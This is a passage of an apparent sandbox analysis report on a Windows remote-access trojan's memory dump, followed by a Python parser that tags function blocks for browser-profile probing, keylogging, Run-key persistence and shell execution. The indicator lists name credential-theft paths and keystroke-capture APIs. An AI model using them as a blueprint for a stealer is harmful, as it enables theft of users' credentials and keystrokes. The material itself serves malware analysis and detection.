                                                        • API String ID: 203985260-263838557
                                                        APIs
                                                          • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                        • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                        • API ID: Init_thread_footer__onexit
                                                        • String ID: [End of clipboard]$[Text copied to clipboard]
                                                        • API String ID: 1881088180-3686566968
                                                        APIs
                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                        • API ID:
                                                        • String ID: ACP$OCP
                                                        • API String ID: 0-711371036
                                                        APIs
                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0044B85B
                                                        • GetLastError.KERNEL32 ref: 0044B884
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: PkGNG
                                                        • API String ID: 442123175-263838557
                                                        APIs
                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0044B76D
                                                        • GetLastError.KERNEL32 ref: 0044B796
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: PkGNG
                                                        • API String ID: 442123175-263838557
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                        Strings
                                                        • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                        • API ID: LocalTime
                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                        • API String ID: 481472006-1507639952
                                                        APIs
                                                        • Sleep.KERNEL32 ref: 0041667B
                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                        • API ID: DownloadFileSleep
                                                        • String ID: !D@
                                                        • API String ID: 1931167962-604454484
                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                        • API ID: ExistsFilePath
                                                        • String ID: alarm.wav$hYG
                                                        • API String ID: 1174141254-2782910960
                                                        APIs
                                                          • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                          • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                        • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                        • String ID: Online Keylogger Stopped
                                                        • API String ID: 1623830855-1496645233
                                                        APIs
                                                        • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
                                                        • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
                                                        • API ID: wave$BufferHeaderPrepare
                                                        • String ID: XMG
                                                        • API String ID: 2315374483-813777761
                                                        APIs
                                                        • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                        • API ID: LocaleValid
                                                        • String ID: IsValidLocaleName$kKD
                                                        • API String ID: 1901932003-3269126172
                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                        • API ID: ExistsFilePath
                                                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                        • API String ID: 1174141254-4188645398
                                                        • Opcode ID: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                                        • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                        • Opcode Fuzzy Hash: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                                        • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                        • API String ID: 1174141254-2800177040
                                                        • Opcode ID: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                                        • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                        • Opcode Fuzzy Hash: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                                        • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: AppData$\Opera Software\Opera Stable\
                                                        • API String ID: 1174141254-1629609700
                                                        • Opcode ID: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                                        • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                        • Opcode Fuzzy Hash: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                                        • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                        APIs
                                                        • GetKeyState.USER32(00000011), ref: 0040B686
                                                          • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                          • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                          • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                          • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                          • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                          • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                          • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                          • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                        • String ID: [AltL]$[AltR]
                                                        • API String ID: 2738857842-2658077756
                                                        • Opcode ID: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                                        • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                        • Opcode Fuzzy Hash: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                                        • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                        APIs
                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Time$FileSystem
                                                        • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                                        • API String ID: 2086374402-949981407
                                                        • Opcode ID: 67c6cfd282551a1661be117684b46016d00bd60ab82fcb0a51b6389df98130eb
                                                        • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                        • Opcode Fuzzy Hash: 67c6cfd282551a1661be117684b46016d00bd60ab82fcb0a51b6389df98130eb
                                                        • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExecuteShell
                                                        • String ID: !D@$open
                                                        • API String ID: 587946157-1586967515
                                                        • Opcode ID: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                                        • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                        • Opcode Fuzzy Hash: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                                        • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                        APIs
                                                        • ___initconout.LIBCMT ref: 004555DB
                                                          • Part of subcall function 00456B9D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00456BB0
                                                        • WriteConsoleW.KERNEL32 ref: 004555FE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ConsoleCreateFileWrite___initconout
                                                        • String ID: PkGNG
                                                        • API String ID: 3087715906-263838557
                                                        • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                                        • Instruction ID: 53f4b2898eb153bde3bf118a85e4039abf363423ff24ad7888d91dc13aa78fd6
                                                        • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                                        • Instruction Fuzzy Hash: C5E0EDB0100548BBDA208B69DC29EBA3328EB00331F500369FE29C62D2EB34EC44C769
                                                        APIs
                                                        • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: State
                                                        • String ID: [CtrlL]$[CtrlR]
                                                        • API String ID: 1649606143-2446555240
                                                        • Opcode ID: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                                        • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                        • Opcode Fuzzy Hash: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                                        • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                        APIs
                                                          • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                        • __Init_thread_footer.LIBCMT ref: 00410F64
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Init_thread_footer__onexit
                                                        • String ID: ,kG$0kG
                                                        • API String ID: 1881088180-2015055088
                                                        • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                        • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                        • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                        • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                        APIs
                                                        Strings
                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteOpenValue
                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                        • API String ID: 2654517830-1051519024
                                                        • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                        • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                        • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                        • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                        • GetLastError.KERNEL32 ref: 00440D85
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                        • String ID:
                                                        • API String ID: 1717984340-0
                                                        • Opcode ID: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                        • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                        • Opcode Fuzzy Hash: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                        • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                        APIs
                                                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411F2B), ref: 00411BC7
                                                        • IsBadReadPtr.KERNEL32(?,00000014,00411F2B), ref: 00411C93
                                                        • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411CB5
                                                        • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLastRead
                                                        • String ID:
                                                        • API String ID: 4100373531-0
                                                        • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                        • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                        • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                        • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99
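The function blocks above follow one fixed layout (an "APIs" section with `ref:` addresses, a "Strings" section with `xrefs:`, then key/value lines such as "API ID" and "String ID", where `$` separates values). The following parser and triage helper is an added example written for this page; it is not Joe Sandbox code and the capability tags it assigns (browser-profile probe, keylogging, Run-key persistence, shell execution) are this editor's own heuristics, chosen from the APIs and literals visible in the blocks above. The sample input is constructed from three of those blocks, with the hash lines omitted. One caveat the format itself imposes: "String ID" joins values with `$`, so a literal `$` inside a string (the report shows `CONOUT$` in an argument list) cannot be told apart from a separator.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: three function blocks in the report's own layout,
# copied from the analysis above with the Opcode/Instruction hash lines removed.
SAMPLE = r"""
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
Strings
Memory Dump Source
• Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: UserProfile$\AppData\Local\Google\Chrome\
• API String ID: 1174141254-4188645398
APIs
• GetKeyState.USER32(00000011), ref: 0040B686
  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
  • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
Strings
Similarity
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
APIs
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
Similarity
• API ID: DeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
"""

# Section headers exactly as the report prints them; "APIs" opens a new block.
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function ADDR: ".
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
                    r"(?P<name>[\w@]+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
XREF_RE = re.compile(r"^(?P<value>.*), xrefs: (?P<ref>[0-9A-F]+)$")

# Heuristic indicators (editor's assumptions, drawn from the literals above).
BROWSER_PATHS = ("\\Google\\Chrome\\", "\\Microsoft\\Edge\\", "\\Opera Software\\")
KEYLOG_APIS = {"GetKeyState", "GetKeyboardState", "ToUnicodeEx", "GetKeyboardLayout"}
RUN_KEYS = ("CurrentVersion\\Policies\\Explorer\\Run", "CurrentVersion\\Run")


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)     # (name, module, args, ref)
    strings: list = field(default_factory=list)  # literals from the Strings section
    meta: dict = field(default_factory=dict)     # "API ID", "String ID", "Source File", ...


def parse_blocks(text):
    """Split report text into FunctionBlock records, one per 'APIs' header."""
    blocks, section, block = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                block = FunctionBlock()
                blocks.append(block)
            section = line
            continue
        if block is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                block.apis.append((m["name"], m["module"], m["args"] or "", m["ref"]))
        elif section == "Strings":
            m = XREF_RE.match(body)
            if m:
                block.strings.append(m["value"])
        else:  # key/value lines; only the first ':' separates key from value
            key, _, value = body.partition(":")
            block.meta[key.strip()] = value.strip()
    return blocks


def classify(block):
    """Return the set of capability tags suggested by a block's APIs and literals."""
    literals = block.strings + block.meta.get("String ID", "").split("$")
    names = {name for name, _, _, _ in block.apis}
    tags = set()
    if any(p in s for s in literals for p in BROWSER_PATHS):
        tags.add("browser-profile-probe")
    if names & KEYLOG_APIS:
        tags.add("keylogging")
    if any(k in s for s in literals for k in RUN_KEYS):
        tags.add("run-key-persistence")
    if "ShellExecuteW" in names:
        tags.add("shell-execute")
    return tags


def summarize(text):
    """[(API ID, sorted tags)] for every block in the text, in report order."""
    return [(b.meta.get("API ID", ""), sorted(classify(b))) for b in parse_blocks(text)]


if __name__ == "__main__":
    for api_id, tags in summarize(SAMPLE):
        print(f"{api_id or '(no API ID)':60} {', '.join(tags) or '-'}")
```

Run over a whole report section, the summary gives a one-line-per-function view of which blocks touch browser profile directories, keyboard-state APIs or the Policies\Explorer\Run key, which is usually enough to decide where to start reading the disassembly. The tags are triage hints, not verdicts: a single `PathFileExistsW` on a Chrome path is consistent with the credential-theft signatures listed at the top of the report, but confirming the behaviour still requires reading the function that consumes the result.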